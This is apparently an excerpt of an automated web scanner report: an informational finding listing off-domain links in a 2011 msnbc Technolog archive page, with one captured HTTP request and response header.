<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5935983-dont-worry-wi-fi-only-tablets-are-coming" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5935650" data-contentId="5935650" class="inlinePhoto photo_portrait photo_align_right user_inline_photo" style="width:264px;"><img id="helenaspopkin/5935650.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5935650.jpg" width="264" height="324" alt="" /><!-- end5935650 -->
...[SNIP]...
<p>"Is anybody else getting random status updates from this person?" reads the first post in a Facebook Security discussion titled<a href="http://www.facebook.com/topic.php?uid=31987371885&amp;topic=14769"> "Roy Castillo (Roy Castillo)"</a>
...[SNIP]...
<p>Then on Thursday, like Keyser S&ouml;ze, he was gone, leaving little more than dozens of unanswered user questions, a <a href="http://www.facebook.com/topic.php?uid=31987371885&amp;topic=14769#!/pages/Roy-Castillo-WTF/191704690855344">Roy Castillo WTF Fan Page </a>and a <a href="http://twitter.com/#!/search/%23roycastillo">hilarious Twitter thread</a>
...[SNIP]...
<em>Helen A.S. Popkin writes about Facebook ... a lot. Follow her on <a href="http://twitter.com/helenaspopkin">Twitter</a> and/or <a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128">Facebook</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook" data-Text="Mysterious 'Roy Castillo' haunts Facebook">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5935542-mysterious-roy-castillo-haunts-facebook" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog" data-Text="Android getting games from Sony">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>That's what&nbsp;Verizon is&nbsp;apparently offering, according to an e-mail shared by <a href="http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/">MacRumors.com</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program" data-Text="Verizon offering AT&T iPhone trade-in program?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5934467" data-contentId="5934467" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="helenaspopkin/5934467.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5934467.jpg" width="280" height="210" alt="" /><div class="photo_credit_container">
...[SNIP]...
</span> <a href="http://www.macrumors.com/2011/01/26/verizon-iphone-pre-orders-to-start-at-3am-et-on-february-3rd-offering-atandt-trade-ins/"><span>
...[SNIP]...
</span> saga, controversy, and hopefully, <a href="http://www.youtube.com/watch?v=4L-ueFdKzjc&amp;feature=player_embedded">Julian <span>
...[SNIP]...
<p>Hooray! <a href="http://www.urlesque.com/2011/01/27/old-spice-guy-isaiah-mustafa-back/">The Old Spice dude is back!</a>
...[SNIP]...
<p>Oh noes! An&nbsp;Amazon security flaw may make <a href="http://feeds.gawker.com/~r/lifehacker/full/~3/VbASl0_jzW8/amazon-security-flaw-may-make-your-old-password-easy-to-crack">your&nbsp;old Amazon password easy to crack</a>
...[SNIP]...
</span> ... I wonder what ever happened to all those nerds in that one iconic Microsoft staff photo from 1978. <a href="http://www.businessinsider.com/microsoft-1978-photo-2011-1#">Maybe this link knows something.&nbsp;</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds" data-Text="Pre-caffeine tech: Security cracks, '70s nerds">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlineCode__5936907" class="inlineCode photo_align_block" data-contentid="5936907"><object width="592" height="346" id="msnbc8a9862" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0"><param name="movie" value="http://www.msnbc.redacted/id/32545640" />
...[SNIP]...
<p>President of SCE Worldwide Studios, Shuhei Yoshida, told the audience at the Tokyo event that the NGP's graphics are of&nbsp;PlayStation 3 quality, reported game blog Kotaku, which had reporter <a target="_blank" href="http://kotaku.com/5744297/live+blogging-sonys-psp2-press-event">Brian Ashcraft on site and live blogging from the event.</a>
...[SNIP]...
<div id="vine-inlinePhoto__5932923" data-contentId="5932923" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="wbenedetti/5932923.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5932923.jpg" width="600" height="396" alt="" /><p class="photo_credit">
...[SNIP]...
</span>And famed "Metal Gear" creator Hideo Kojima demonstrated "Metal Gear Solid 4: Guns of the Patriots" running on the NGP. In fact, <a target="_blank" href="http://kotaku.com/5744571/metal-gear-solid-4-lost-planet-yakuza-shown-playable-on-psp2">Kotaku reports</a>
...[SNIP]...
<p>The NGP certainly isn't a small device. Sony calls it a "Super Oval Design" which is meant to be comfortable for long play sessions, according to Sony's Jeff Rubenstein, who live blogged the event <a target="_blank" href="http://blog.us.playstation.com/2011/01/26/live-from-japan-playstation-meeting-2011/">via the PlayStation Blog</a>.&nbsp;And at 182 mm&nbsp;by 18.6 mm by&nbsp;83.5 mm, it&nbsp;is&nbsp;larger than the current model PSP 3000. In fact, for a look at just how big it is, check out Kotaku's visual&nbsp;<a target="_blank" href="http://kotaku.com/5744563/lets-see-how-big-this-psp2-really-is">size comparison here</a>
...[SNIP]...
<div id="vine-inlinePhoto__5933512" data-contentId="5933512" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="wbenedetti/5933512.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5933512.jpg" width="600" height="409" alt="" /><div class="photo_credit_container">
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog" data-Text="Sony reveals PSP successor - the Next Generation Portable">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5927180" data-contentId="5927180" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="suzanne-choney/5927180.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5927180.jpg" width="280" height="135" alt="" /><!-- end5927180 -->
...[SNIP]...
<p>On Twitter, the short-messaging blog where posts are limited to 140 characters, access from Egypt was difficult as reported by <a href="http://www.herdict.org/web/">Herdict.org</a>
...[SNIP]...
million members and has the largest number of users of Facebook&rsquo;s Arabic interface (2.2 million Facebook Arabic users in Egypt, versus 1.8 million in the Kingdom of Saudi Arabia)," according to <a href="http://www.spotonpr.com/egypt-facebook-demographics/">Spot On PR</a>
...[SNIP]...
networking shut-out&nbsp;has echoes of Iran 2-1/2 years ago, when in the wake of the presidential election and protests, the government there worked to block network and dial-up access to Facebook and <a href="http://redtape.msnbc.com/2009/06/twitter-1-censorship-0-why-its-working.html">Twitter</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow" data-Text="Egypt may be blocking Twitter and Facebook as protests grow">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</em> - HTC is slated to unveil not one but two Facebook phones in February at the Mobile World Congress in Barcelona, according to <a href="http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone">City AM</a>
...[SNIP]...
<p>City AM's reporter may have reported on the existence of the second Google Nexus phone, as <a href="http://mashable.com/2010/10/26/nexus-two/">Mashable points out</a>
...[SNIP]...
<em><a href="http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone">City AM</a> via <a href="http://www.businessinsider.com/facebook-phone-wont-be-a-new-platform-2011-1">Business Insider</a> and <a href="http://mashable.com/2011/01/26/htc-to-unveil-2-facebook-phones-next-month/">Mashable</a>
...[SNIP]...
<i>Catch up with Wilson on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>, or skip the one-on-one and join the conversation at our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming" data-Text="Rumor: Facebook phones are coming!!!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5927996" data-contentId="5927996" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="wbenedetti/5927996.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5927996.jpg" width="280" height="173" alt="" /><p class="photo_credit">
...[SNIP]...
<p>The Sony Ericsson Xperia Play phone has run rampant in the rumor mill for months now, but <a target="_blank" href="http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/">Engadget reports</a>
...[SNIP]...
<p>Engadget reminds readers that "what we're seeing here is subject to changes." They expect Sony to reveal many of the final details about the phone at the <a target="_blank" href="http://www.mobileworldcongress.com/">Mobile World Congress taking place in Spain</a>
...[SNIP]...
<p>Check out the entirety of&nbsp;Engadget's coverage and their many photos of the device&nbsp;<a target="_blank" href="http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/">here</a>
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><i>
...[SNIP]...
</i><a target="_blank" href="http://twitter.com/WindaBenedetti"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog" data-Text="Sony's PlayStation phone is for real">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5925431" data-contentId="5925431" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="suzanne-choney/5925431.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5925431.jpg" width="280" height="157" alt="" /><!-- end5925431 -->
...[SNIP]...
<p>It doesn't appear to be&nbsp;a huge issue, but it is an irritating one&nbsp;&mdash; many Facebook users have shared their befuddlement on <a href="http://www.facebook.com/topic.php?uid=31987371885&amp;topic=14747&amp;post=70129">Facebook's discussion page</a>
...[SNIP]...
<p>Hat tip to <a href="http://valleywag.gawker.com/5743293/facebook-mobile-says-to-call-911">Valleywag</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-" data-Text="Ignore Facebook messages to call 911 ">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>It's all part of Facebook's "Data Privacy Day" celebration, a poorly promoted &mdash; <a href="http://dataprivacyday2010.org/about/">yet totally real</a>
...[SNIP]...
<p>According to <a href="http://blog.facebook.com/blog.php?post=486790652130">Facebook's Data Privacy Day blog post</a>
...[SNIP]...
<strong>Here's some other known bugs <a href="http://www.facebook.com/help/?search=known+issues#!/help/?page=777">Facebook is actively dealing with right now</a>
...[SNIP]...
<p>And&nbsp;in the grand spirit of Data Privacy Day, <a href="http://blog.facebook.com/blog.php?post=436800707130">here's some current Facebook security information you should know</a>
...[SNIP]...
</em><a href="http://twitter.com/helenaspopkin"><i>
...[SNIP]...
</em><a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-" data-Text="Locked out of Facebook? Happy 'Data Privacy Day!' ">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.347. http://technolog.msnbc.redacted/_nv/more/section/archive

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /_nv/more/section/archive

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_nv/more/section/archive?date=2011/1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=288
Date: Sun, 30 Jan 2011 18:43:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 243536

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/fa8e2c7b4e481656a284f68469c7f35eb684a538.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247"></script>
